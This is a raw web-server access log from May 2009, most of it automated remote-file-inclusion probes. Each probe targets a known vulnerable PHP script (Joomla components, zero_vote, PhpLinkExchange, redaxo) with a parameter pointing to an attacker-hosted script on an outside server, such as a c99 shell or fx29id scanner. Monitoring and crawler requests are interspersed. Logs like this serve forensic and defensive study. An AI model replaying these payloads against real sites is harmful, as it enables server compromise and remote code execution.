221.139.104.104 - - [29/May/2009:02:27:18 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:02:27:18 -0400] "GET /logs/access_log.Q109052100///vwar/backup/errors.php?error=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:02:27:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.236.47.188 - - [29/May/2009:02:27:48 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://w7ed.by.ru/c99.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.65"
220.79.47.122 - - [29/May/2009:02:28:49 -0400] "GET /logs/access_log.Q108072400%20%20/errors.php?error=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.79.47.122 - - [29/May/2009:02:28:50 -0400] "GET /errors.php?error=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
220.79.47.122 - - [29/May/2009:02:28:54 -0400] "GET /logs/errors.php?error=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.154.158.18 - - [29/May/2009:02:29:35 -0400] "GET /logs/access_log.Q108070600 HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
41.210.252.16 - - [29/May/2009:02:29:40 -0400] "GET /logs/access_log.Q108070600 HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
222.236.47.188 - - [29/May/2009:02:31:27 -0400] "GET /logs/error_log.Q108051600//PhpLinkExchange/bits_listings.php?svr_rootP=http://w7ed.by.ru/c99.txt? HTTP/1.1" 404 258 "-" "libwww-perl/5.65"
222.236.47.188 - - [29/May/2009:02:31:28 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://w7ed.by.ru/c99.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.65"
222.236.47.188 - - [29/May/2009:02:31:28 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://w7ed.by.ru/c99.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
209.59.12.99 - - [29/May/2009:02:32:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.151.233.72 - - [29/May/2009:02:33:24 -0400] "GET /logs//errors.php?error=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:02:33:24 -0400] "GET //errors.php?error=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
222.236.47.188 - - [29/May/2009:02:34:12 -0400] "GET /logs/access_log.Q109050700//PhpLinkExchange/bits_listings.php?svr_rootP=http://w7ed.by.ru/c99.txt? HTTP/1.1" 404 259 "-" "libwww-perl/5.65"
70.87.152.58 - - [29/May/2009:02:34:46 -0400] "GET /logs/access_log.Q109051800//skin/zero_vote/error.php?dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 250 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
70.87.152.58 - - [29/May/2009:02:34:46 -0400] "GET //skin/zero_vote/error.php?dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 223 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
70.87.152.58 - - [29/May/2009:02:34:48 -0400] "GET /logs/error_log.Q109051000//skin/zero_vote/ask_password.php?dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.79"
70.87.152.58 - - [29/May/2009:02:35:26 -0400] "GET /logs/access_log.Q109051800//skin/zero_vote/error.php?dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
70.87.152.58 - - [29/May/2009:02:35:26 -0400] "GET //skin/zero_vote/error.php?dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
221.139.104.104 - - [29/May/2009:02:35:27 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:02:35:27 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:02:35:27 -0400] "GET /phphtml.php?htmlclass_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
70.87.152.58 - - [29/May/2009:02:35:27 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
221.139.104.104 - - [29/May/2009:02:35:48 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:02:35:48 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
220.79.47.122 - - [29/May/2009:02:37:05 -0400] "GET /logs/access_log.Q109050700/index.php?meio=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
220.79.47.122 - - [29/May/2009:02:37:10 -0400] "GET /logs/index.php?meio=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
220.79.47.122 - - [29/May/2009:02:37:10 -0400] "GET /index.php?meio=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
70.87.152.58 - - [29/May/2009:02:37:19 -0400] "GET /logs/access_log.Q109052300//skin/zero_vote/error.php?dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
209.59.12.99 - - [29/May/2009:02:37:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.87.152.58 - - [29/May/2009:02:37:59 -0400] "GET //skin/zero_vote/error.php?dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
94.23.200.54 - - [29/May/2009:02:40:05 -0400] "GET /index.php?redir=http://www.geocities.com/crime_core08/fx29id.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
94.23.200.54 - - [29/May/2009:02:40:05 -0400] "GET /logs/access_log.Q109051000%20%20/index.php?redir=http://www.geocities.com/crime_core08/fx29id.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
94.23.200.54 - - [29/May/2009:02:40:05 -0400] "GET /logs/index.php?redir=http://www.geocities.com/crime_core08/fx29id.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
94.23.200.54 - - [29/May/2009:02:40:10 -0400] "GET /logs/access_log.Q109051000/index.php?redir=http://www.geocities.com/crime_core08/fx29id.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
94.23.200.54 - - [29/May/2009:02:40:10 -0400] "GET /index.php?redir=http://www.geocities.com/crime_core08/fx29id.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
94.23.200.54 - - [29/May/2009:02:40:10 -0400] "GET /logs/index.php?redir=http://www.geocities.com/crime_core08/fx29id.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
70.87.152.58 - - [29/May/2009:02:40:31 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
94.23.200.54 - - [29/May/2009:02:41:06 -0400] "GET /index.php?redir=http://www.geocities.com/crime_core08/fx29id.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
94.23.200.54 - - [29/May/2009:02:41:06 -0400] "GET /logs/index.php?redir=http://www.geocities.com/crime_core08/fx29id.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
94.23.200.54 - - [29/May/2009:02:41:06 -0400] "GET /logs/access_log.Q109051000/index.php?redir=http://www.geocities.com/crime_core08/fx29id.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:02:42:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.151.134.36 - - [29/May/2009:02:42:32 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.bbenglish.net/zb41/sup?? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
216.151.134.36 - - [29/May/2009:02:42:33 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.bbenglish.net/zb41/sup?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
200.107.3.73 - - [29/May/2009:02:42:45 -0400] "GET /logs/access_log.Q109051600//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://190.220.29.155/.sys/v6id.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
70.87.152.58 - - [29/May/2009:02:44:17 -0400] "GET /logs/access_log.Q108040300//skin/zero_vote/ask_password.php?dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
70.87.152.58 - - [29/May/2009:02:44:17 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
70.87.152.58 - - [29/May/2009:02:44:17 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
211.233.22.209 - - [29/May/2009:02:44:59 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 200 454 "-" "libwww-perl/5.79"
195.34.78.110 - - [29/May/2009:02:45:54 -0400] "GET /logs/error_log.Q108061800/errors.php?error=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
195.34.78.110 - - [29/May/2009:02:45:54 -0400] "GET /logs/error_log.Q108061800/errors.php?error=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
195.34.78.110 - - [29/May/2009:02:45:55 -0400] "GET /errors.php?error=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
195.34.78.110 - - [29/May/2009:02:45:55 -0400] "GET /errors.php?error=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
195.34.78.110 - - [29/May/2009:02:45:55 -0400] "GET /logs/errors.php?error=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
195.34.78.110 - - [29/May/2009:02:45:55 -0400] "GET /logs/errors.php?error=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
221.139.104.104 - - [29/May/2009:02:47:28 -0400] "GET /logs/access_log.Q109051000/phphtml.php?htmlclass_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:02:47:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.173.162.150 - - [29/May/2009:02:51:37 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2)"
122.173.162.150 - - [29/May/2009:02:51:37 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2)"
122.173.162.150 - - [29/May/2009:02:52:01 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2)"
122.173.162.150 - - [29/May/2009:02:52:01 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2)"
74.52.2.130 - - [29/May/2009:02:52:12 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
74.52.2.130 - - [29/May/2009:02:52:12 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
74.52.2.130 - - [29/May/2009:02:52:12 -0400] "GET /logs/access_log.Q109051100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:02:52:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.34.78.110 - - [29/May/2009:02:53:03 -0400] "GET /logs/error_log.Q108070500/errors.php?error=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
195.34.78.110 - - [29/May/2009:02:53:03 -0400] "GET /logs/error_log.Q108070500/errors.php?error=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
216.221.10.116 - - [29/May/2009:02:53:27 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:02:53:27 -0400] "GET /logs/access_log.Q109021500%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:02:53:29 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:02:53:46 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:02:53:46 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:02:53:46 -0400] "GET /logs/access_log.Q109021500%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:02:53:59 -0400] "GET /logs/access_log.Q109021500%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:02:53:59 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:02:53:59 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
65.23.158.226 - - [29/May/2009:02:54:00 -0400] "GET /logs/error_log.Q109050500%20%20//redaxo/include//functions.inc.php?REX[INCLUDE_PATH]=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
65.23.158.226 - - [29/May/2009:02:54:00 -0400] "GET //redaxo/include//functions.inc.php?REX[INCLUDE_PATH]=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
65.23.158.226 - - [29/May/2009:02:54:01 -0400] "GET /logs//redaxo/include//functions.inc.php?REX[INCLUDE_PATH]=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.23.158.226 - - [29/May/2009:02:54:13 -0400] "GET /logs/access_log.Q109051000%20%20//redaxo/include//functions.inc.php?REX[INCLUDE_PATH]=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
65.23.158.226 - - [29/May/2009:02:54:14 -0400] "GET //redaxo/include//functions.inc.php?REX[INCLUDE_PATH]=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
65.23.158.226 - - [29/May/2009:02:54:14 -0400] "GET /logs//redaxo/include//functions.inc.php?REX[INCLUDE_PATH]=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.23.158.226 - - [29/May/2009:02:54:14 -0400] "GET /logs/error_log.Q109050500%20%20//redaxo/include//functions.inc.php?REX[INCLUDE_PATH]=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
65.23.158.226 - - [29/May/2009:02:54:25 -0400] "GET /logs/access_log.Q109051000%20%20//redaxo/include//functions.inc.php?REX[INCLUDE_PATH]=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
94.23.200.54 - - [29/May/2009:02:55:36 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/crime_core08/fx29id.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
94.23.200.54 - - [29/May/2009:02:55:36 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/crime_core08/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
94.23.200.54 - - [29/May/2009:02:55:36 -0400] "GET /logs/access_log.Q109051100%20%20//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/crime_core08/fx29id.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
216.151.134.36 - - [29/May/2009:02:56:12 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.bbenglish.net/zb41/sup?? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
216.151.134.36 - - [29/May/2009:02:56:13 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.bbenglish.net/zb41/sup?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
216.221.10.116 - - [29/May/2009:02:56:49 -0400] "GET /logs/access_log.Q108091400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
74.52.2.130 - - [29/May/2009:02:57:03 -0400] "GET /logs/access_log.Q109051100%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
195.34.78.110 - - [29/May/2009:02:57:20 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
195.34.78.110 - - [29/May/2009:02:57:20 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
195.34.78.110 - - [29/May/2009:02:57:20 -0400] "GET /logs/access_log.Q109021500%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
195.34.78.110 - - [29/May/2009:02:57:26 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
195.34.78.110 - - [29/May/2009:02:57:26 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
195.34.78.110 - - [29/May/2009:02:57:26 -0400] "GET /logs/access_log.Q109021500%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:02:57:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.98.80.2 - - [29/May/2009:02:57:34 -0400] "GET /logs/error_log.Q109052000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
74.52.2.130 - - [29/May/2009:02:57:41 -0400] "GET /logs/access_log.Q109052200%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
195.34.78.110 - - [29/May/2009:02:57:44 -0400] "GET /logs/error_log.Q108110800%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
195.34.78.110 - - [29/May/2009:02:57:45 -0400] "GET /logs/error_log.Q108110800%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:02:57:48 -0400] "GET /logs/error_log.Q109052000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:02:58:10 -0400] "GET /logs/access_log.Q108091400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
65.23.158.226 - - [29/May/2009:02:58:42 -0400] "GET /logs/error_log.Q109050500//redaxo/include//functions.inc.php?REX[INCLUDE_PATH]=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
65.23.158.226 - - [29/May/2009:02:58:42 -0400] "GET /logs/access_log.Q109051000//redaxo/include//functions.inc.php?REX[INCLUDE_PATH]=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:02:58:58 -0400] "GET /logs/error_log.Q109052000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
207.213.245.215 - - [29/May/2009:02:59:40 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
207.213.245.215 - - [29/May/2009:02:59:40 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
207.213.245.215 - - [29/May/2009:02:59:40 -0400] "GET /logs/access_log.Q109051500%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
207.213.245.215 - - [29/May/2009:02:59:47 -0400] "GET /logs/access_log.Q109052100%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:02:59:51 -0400] "GET //?path%5Bdocroot%5D=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:02:59:51 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 200 3299 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:03:01:04 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:03:01:04 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:03:01:09 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
65.23.158.226 - - [29/May/2009:03:01:25 -0400] "GET /logs/error_log.Q109050500//redaxo/include//functions.inc.php?REX[INCLUDE_PATH]=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
65.23.158.226 - - [29/May/2009:03:01:33 -0400] "GET /logs/access_log.Q109051000//redaxo/include//functions.inc.php?REX[INCLUDE_PATH]=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:03:01:42 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:03:01:42 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:03:01:42 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
211.233.22.209 - - [29/May/2009:03:01:43 -0400] "GET /logs/error_log.Q108051500////?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
211.233.22.209 - - [29/May/2009:03:01:44 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 200 3301 "-" "libwww-perl/5.79"
195.34.78.110 - - [29/May/2009:03:02:14 -0400] "GET /logs/access_log.Q108091400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:03:03:04 -0400] "GET /logs/access_log.Q109051100%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
74.6.8.108 - - [29/May/2009:03:03:28 -0400] "GET /logs/error_log.Q108111700 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [29/May/2009:03:03:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.221.10.116 - - [29/May/2009:03:03:48 -0400] "GET /logs/access_log.Q109050700%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
220.181.7.97 - - [29/May/2009:03:03:51 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
65.98.80.2 - - [29/May/2009:03:04:08 -0400] "GET /logs/access_log.Q109051100%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
